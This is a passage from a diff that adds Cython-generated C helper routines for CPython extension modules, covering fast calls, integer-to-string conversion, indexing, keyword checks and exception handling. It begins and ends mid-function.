PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* CIntToDigits */ +static const char DIGIT_PAIRS_10[2*10*10+1] = { + "00010203040506070809" + "10111213141516171819" + "20212223242526272829" + "30313233343536373839" + "40414243444546474849" + "50515253545556575859" + "60616263646566676869" + "70717273747576777879" + "80818283848586878889" + "90919293949596979899" +}; +static const char DIGIT_PAIRS_8[2*8*8+1] = { + "0001020304050607" + "1011121314151617" + "2021222324252627" + "3031323334353637" + "4041424344454647" + "5051525354555657" + "6061626364656667" + "7071727374757677" +}; +static const char DIGITS_HEX[2*16+1] = { + "0123456789abcdef" + "0123456789ABCDEF" +}; + +/* BuildPyUnicode */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char) { + PyObject *uval; + Py_ssize_t uoffset = ulength - clength; +#if CYTHON_USE_UNICODE_INTERNALS + Py_ssize_t i; +#if CYTHON_PEP393_ENABLED + void *udata; + uval = PyUnicode_New(ulength, 127); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_DATA(uval); +#else + Py_UNICODE *udata; + uval = PyUnicode_FromUnicode(NULL, ulength); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_AS_UNICODE(uval); +#endif + if (uoffset > 0) { + i = 0; + if (prepend_sign) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, 0, '-'); + i++; + } + for (; i < uoffset; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, i, padding_char); + } + } + for (i=0; i < clength; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, uoffset+i, chars[i]); + } +#else + { + PyObject *sign = NULL, *padding = NULL; + uval = NULL; + if (uoffset > 0) { + prepend_sign = !!prepend_sign; + if (uoffset > prepend_sign) { + padding = PyUnicode_FromOrdinal(padding_char); + if (likely(padding) && uoffset > prepend_sign + 1) { + PyObject *tmp; + PyObject *repeat = PyInt_FromSsize_t(uoffset - prepend_sign); + if (unlikely(!repeat)) goto done_or_error; + tmp = PyNumber_Multiply(padding, repeat); + Py_DECREF(repeat); + Py_DECREF(padding); + padding = tmp; + } + if (unlikely(!padding)) goto done_or_error; + } + if (prepend_sign) { + sign = PyUnicode_FromOrdinal('-'); + if (unlikely(!sign)) goto done_or_error; + } + } + uval = PyUnicode_DecodeASCII(chars, clength, NULL); + if (likely(uval) && padding) { + PyObject *tmp = PyNumber_Add(padding, uval); + Py_DECREF(uval); + uval = tmp; + } + if (likely(uval) && sign) { + PyObject *tmp = PyNumber_Add(sign, uval); + Py_DECREF(uval); + uval = tmp; + } +done_or_error: + Py_XDECREF(padding); + Py_XDECREF(sign); + } +#endif + return uval; +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(int)*3+2]; + char *dpos, *end = digits + sizeof(int)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + int remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (int) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (int) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (int) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(Py_ssize_t)*3+2]; + char *dpos, *end = digits + sizeof(Py_ssize_t)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + Py_ssize_t remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const Py_ssize_t neg_one = (Py_ssize_t) -1, const_zero = (Py_ssize_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (Py_ssize_t) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (Py_ssize_t) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (Py_ssize_t) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* JoinPyUnicode */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char) { +#if CYTHON_USE_UNICODE_INTERNALS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyObject *result_uval; + int result_ukind, kind_shift; + Py_ssize_t i, char_pos; + void *result_udata; + CYTHON_MAYBE_UNUSED_VAR(max_char); +#if CYTHON_PEP393_ENABLED + result_uval = PyUnicode_New(result_ulength, max_char); + if (unlikely(!result_uval)) return NULL; + result_ukind = (max_char <= 255) ? PyUnicode_1BYTE_KIND : (max_char <= 65535) ? PyUnicode_2BYTE_KIND : PyUnicode_4BYTE_KIND; + kind_shift = (result_ukind == PyUnicode_4BYTE_KIND) ? 2 : result_ukind - 1; + result_udata = PyUnicode_DATA(result_uval); +#else + result_uval = PyUnicode_FromUnicode(NULL, result_ulength); + if (unlikely(!result_uval)) return NULL; + result_ukind = sizeof(Py_UNICODE); + kind_shift = (result_ukind == 4) ? 2 : result_ukind - 1; + result_udata = PyUnicode_AS_UNICODE(result_uval); +#endif + assert(kind_shift == 2 || kind_shift == 1 || kind_shift == 0); + char_pos = 0; + for (i=0; i < value_count; i++) { + int ukind; + Py_ssize_t ulength; + void *udata; + PyObject *uval = PyTuple_GET_ITEM(value_tuple, i); + if (unlikely(__Pyx_PyUnicode_READY(uval))) + goto bad; + ulength = __Pyx_PyUnicode_GET_LENGTH(uval); + if (unlikely(!ulength)) + continue; + if (unlikely((PY_SSIZE_T_MAX >> kind_shift) - ulength < char_pos)) + goto overflow; + ukind = __Pyx_PyUnicode_KIND(uval); + udata = __Pyx_PyUnicode_DATA(uval); + if (!CYTHON_PEP393_ENABLED || ukind == result_ukind) { + memcpy((char *)result_udata + (char_pos << kind_shift), udata, (size_t) (ulength << kind_shift)); + } else { + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030300F0 || defined(_PyUnicode_FastCopyCharacters) + _PyUnicode_FastCopyCharacters(result_uval, char_pos, uval, 0, ulength); + #else + Py_ssize_t j; + for (j=0; j < ulength; j++) { + Py_UCS4 uchar = __Pyx_PyUnicode_READ(ukind, udata, j); + __Pyx_PyUnicode_WRITE(result_ukind, result_udata, char_pos+j, uchar); + } + #endif + } + char_pos += ulength; + } + return result_uval; +overflow: + PyErr_SetString(PyExc_OverflowError, "join() result is too long for a Python string"); +bad: + Py_DECREF(result_uval); + return NULL; +#else + CYTHON_UNUSED_VAR(max_char); + CYTHON_UNUSED_VAR(result_ulength); + CYTHON_UNUSED_VAR(value_count); + return PyUnicode_Join(__pyx_empty_unicode, value_tuple); +#endif +} + +/* GetAttr */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *o, PyObject *n) { +#if CYTHON_USE_TYPE_SLOTS +#if PY_MAJOR_VERSION >= 3 + if (likely(PyUnicode_Check(n))) +#else + if (likely(PyString_Check(n))) +#endif + return __Pyx_PyObject_GetAttrStr(o, n); +#endif + return PyObject_GetAttr(o, n); +} + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* ObjectGetItem */ +#if CYTHON_USE_TYPE_SLOTS +static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { + PyObject *runerr = NULL; + Py_ssize_t key_value; + key_value = __Pyx_PyIndex_AsSsize_t(index); + if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { + return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); + } + if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { + __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); + PyErr_Clear(); + PyErr_Format(PyExc_IndexError, + "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); + __Pyx_DECREF_TypeName(index_type_name); + } + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { + __Pyx_TypeName obj_type_name; + if (likely(PyType_Check(obj))) { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); + if (meth) { + PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); + Py_DECREF(meth); + return result; + } + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { + PyTypeObject *tp = Py_TYPE(obj); + PyMappingMethods *mm = tp->tp_as_mapping; + PySequenceMethods *sm = tp->tp_as_sequence; + if (likely(mm && mm->mp_subscript)) { + return mm->mp_subscript(obj, key); + } + if (likely(sm && sm->sq_item)) { + return __Pyx_PyObject_GetIndex(obj, key); + } + return __Pyx_PyObject_GetItem_Slow(obj, key); +} +#endif + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* DivInt[Py_ssize_t] */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t a, Py_ssize_t b) { + Py_ssize_t q = a / b; + Py_ssize_t r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* GetAttr3 */ +static PyObject *__Pyx_GetAttr3Default(PyObject *d) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (unlikely(!__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + return NULL; + __Pyx_PyErr_Clear(); + Py_INCREF(d); + return d; +} +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *o, PyObject *n, PyObject *d) { + PyObject *r; +#if CYTHON_USE_TYPE_SLOTS + if (likely(PyString_Check(n))) { + r = __Pyx_PyObject_GetAttrStrNoError(o, n); + if (unlikely(!r) && likely(!PyErr_Occurred())) { + r = __Pyx_NewRef(d); + } + return r; + } +#endif + r = PyObject_GetAttr(o, n); + return (likely(r)) ? r : __Pyx_GetAttr3Default(d); +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* RaiseTooManyValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { + PyErr_Format(PyExc_ValueError, + "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); +} + +/* RaiseNeedMoreValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { + PyErr_Format(PyExc_ValueError, + "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", + index, (index == 1) ? "" : "s"); +} + +/* RaiseNoneIterError */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); +} + +/* ExtTypeTest */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type) { + __Pyx_TypeName obj_type_name; + __Pyx_TypeName type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + if (likely(__Pyx_TypeCheck(obj, type))) + return 1; + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_TypeError, + "Cannot convert " __Pyx_FMT_TYPENAME " to " __Pyx_FMT_TYPENAME, + obj_type_name, type_name); + __Pyx_DECREF_TypeName(obj_type_name); + __Pyx_DECREF_TypeName(type_name); + return 0; +} + +/* GetTopmostException */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * +__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) +{ + _PyErr_StackItem *exc_info = tstate->exc_info; + while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && + exc_info->previous_item != NULL) + { + exc_info = exc_info->previous_item; + } + return exc_info; +} +#endif + +/* SaveResetException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + PyObject *exc_value = exc_info->exc_value; + if (exc_value == NULL || exc_value == Py_None) { + *value = NULL; + *type = NULL; + *tb = 